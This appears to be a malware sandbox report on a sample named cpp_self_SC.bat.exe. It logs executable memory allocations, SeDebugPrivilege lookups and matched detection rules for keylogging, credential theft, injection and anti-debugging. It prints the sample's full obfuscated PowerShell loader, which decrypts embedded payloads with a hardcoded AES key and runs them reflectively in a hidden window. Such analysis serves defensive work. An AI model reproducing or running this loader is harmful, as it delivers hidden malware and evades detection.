heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -w hidden -c #
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate privileges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
cmdline "C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD 
([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
option -w hidden value Attempts to execute command with a hidden window